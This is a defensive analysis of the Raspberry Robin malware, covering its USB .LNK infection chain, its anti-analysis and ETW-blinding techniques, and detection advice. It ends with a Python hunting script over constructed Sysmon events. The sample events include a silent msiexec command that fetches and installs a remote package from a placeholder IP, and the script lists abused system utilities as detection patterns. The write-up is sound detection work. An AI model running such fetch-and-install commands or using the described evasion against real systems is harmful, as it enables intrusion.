Goldberg's technical analysis of a real, actively-tracked threat. Atomic indicators rotate (C2 on compromised infrastructure) — consult references for current detail.
Overview
Raspberry Robin stands out for two reasons: an old-school USB propagation vector that still works, and an unusually well-engineered loader that has made it a premier initial-access broker — selling footholds that have led on to Dridex and to ransomware.
Infection chain
The classic entry point is a user plugging in an infected USB drive that carries a malicious .LNK shortcut. The shortcut kicks off a chain (often abusing msiexec or other legitimate utilities) that pulls down a DLL payload — historically from compromised QNAP devices, frequently over port 8080. By 2024–2025 the delivery had broadened to phishing, malvertising, and Discord's CDN.
Anti-analysis (the interesting part)
- Multi-layer packing, control-flow flattening, and opaque predicates to exhaust reverse engineers.
- Hook detection in `LdrLoadDll()` to spot AV/EDR userland hooks.
- ETW blinding: in-memory patching of `NtTraceEvent` to disable Event Tracing for Windows.
- Anti-VM / anti-sandbox checks that cause a clean exit in analysis environments.
- Payload DLLs masquerade as legitimate libraries (e.g., `libapriconv-1.dll`).
Why it matters
Raspberry Robin is rarely the end goal — it's the front door. A detection here is an early warning that more capable actors may already have purchased access, so it warrants an urgent, assume-breach response rather than a routine clean-up.
Detection & hardening
- Hunt for `.LNK`-initiated `msiexec`/`rundll32` chains reaching external hosts on odd ports (e.g., 8080).
- Flag ETW/AMSI tampering and DLLs loading under legitimate library names from unusual paths.
- Disable USB autorun and control removable-media execution policy (USB is still the vector).
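The first two hunts above, worked as an added example (not from the original analysis) over constructed Sysmon-style events: a LOLBIN spawned by explorer.exe (assumed here as the proxy for a .LNK double-click) that connects to an external host on an odd port, and a DLL carrying the borrowed `libapriconv-1.dll` name that loads from outside a trusted directory. The event field names, the sample paths and addresses, and the trusted-directory list are all assumptions.

```python
import ipaddress

# Constructed sample telemetry (not real logs). Event ids follow Sysmon's
# convention as an assumption: 1 = process create, 3 = network connect, 7 = image load.
EVENTS = [
    {"id": 1, "pid": 9, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'msiexec /q /i "http://203.0.113.7:8080/x.msi"'},
    {"id": 3, "pid": 9, "dst_ip": "203.0.113.7", "dst_port": 8080},
    {"id": 7, "pid": 9, "image_loaded": r"C:\Users\alice\AppData\Local\Temp\libapriconv-1.dll"},
    # Benign control: service-spawned msiexec talking to an internal host on 443,
    # and the same DLL name loaded from a trusted install directory.
    {"id": 1, "pid": 12, "image": r"C:\Windows\System32\msiexec.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "cmdline": "msiexec /V"},
    {"id": 3, "pid": 12, "dst_ip": "10.0.0.5", "dst_port": 443},
    {"id": 7, "pid": 12, "image_loaded": r"C:\Program Files\Git\mingw64\bin\libapriconv-1.dll"},
]

LOLBINS = {"msiexec.exe", "rundll32.exe"}      # utilities the chain abuses
ODD_PORTS = {8080}                              # port cited in the analysis
BORROWED_NAMES = {"libapriconv-1.dll"}          # legitimate name the payload reuses
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")   # assumed allow-list
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)

def hunt(events):
    """Return (pid, rule) findings for the two hunt rules."""
    procs = {e["pid"]: e for e in events if e["id"] == 1}
    findings = []
    for e in events:
        if e["id"] == 3:
            p = procs.get(e["pid"])
            # explorer.exe as parent is the assumed proxy for a .LNK double-click
            if (p and basename(p["image"]) in LOLBINS
                    and basename(p["parent_image"]) == "explorer.exe"
                    and is_external(e["dst_ip"]) and e["dst_port"] in ODD_PORTS):
                findings.append((e["pid"], "lnk_lolbin_external_odd_port"))
        elif e["id"] == 7:
            path = e["image_loaded"].lower()
            if basename(path) in BORROWED_NAMES and not path.startswith(TRUSTED_DIRS):
                findings.append((e["pid"], "borrowed_dll_name_unusual_path"))
    return findings

if __name__ == "__main__":
    for pid, rule in hunt(EVENTS):
        print(f"pid {pid}: {rule}")
```

Only pid 9 trips both rules; the service-spawned msiexec and the DLL under Program Files pass, which is the kind of benign control a rule needs before it goes into production.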